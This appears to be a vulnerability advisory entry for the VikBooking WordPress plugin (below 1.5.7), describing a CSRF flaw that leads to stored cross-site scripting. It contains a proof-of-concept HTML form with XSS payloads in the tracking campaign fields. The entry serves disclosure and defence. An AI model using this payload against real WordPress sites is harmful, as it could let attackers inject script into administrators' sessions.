Lucene search
Gabriel3476WPEX-ID:19A9E266-DAF6-4CC5-A300-2B5436B6D07DHistoryApr 21, 2022 - 12:00 a.m.
VikBooking Hotel Booking Engine & PMS < 1.5.7 - Stored Cross-Site Scripting via CSRF
2022-04-2100:00:00
Gabriel3476
171
vikbooking hotel booking engine
pms
stored cross-site scripting
csrf
statistics tracking settings
xss
csrf exploit
EPSS
0.001
Percentile
26.3%
The plugin does not have CSRF check in place when adding a tracking campaign, and does not escape the campaign fields when outputting them In attributes. As a result, attackers could make a logged in admin add tracking campaign with XSS payloads in them via a CSRF attack
<html>
<body>
<form action="https://example.com/wp-admin/admin.php?option=com_vikbooking" method="POST">
<input type="hidden" name="trkenabled" value="1" />
<input type="hidden" name="trkcookierfrdur" value="3" />
<input type="hidden" name="trkcampname[]" value='Test"style=animation-name:rotation onanimationstart=alert(/XSS-Name/)//' />
<input type="hidden" name="trkcampkey[]" value='"style="animation-name:rotation" onanimationstart="alert(/XSS-Key/)//' />
<input type="hidden" name="trkcampval[]" value='"style=animation-name:rotation onanimationstart=alert(/XSS-Key-Value/)//' />
<input type="hidden" name="option" value="com_vikbooking" />
<input type="hidden" name="task" value="savetrkconfigstay" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
XSS will be triggered in the Statistics Tracking Settings: https://example.com/wp-admin/admin.php?option=com_vikbooking&task=trkconfigRelated
wpvulndb
wpvulndb
prion
prion
Cross site request forgery (csrf)
2022-05-16 15:15:00
cnvd
cnvd
WordPress VikBooking Hotel Booking Engine
2022-05-18 00:00:00
cvelist
cvelist
cve
cve
CVE-2022-1407
2022-05-16 15:15:09
nvd
nvd
CVE-2022-1407
2022-05-16 15:15:09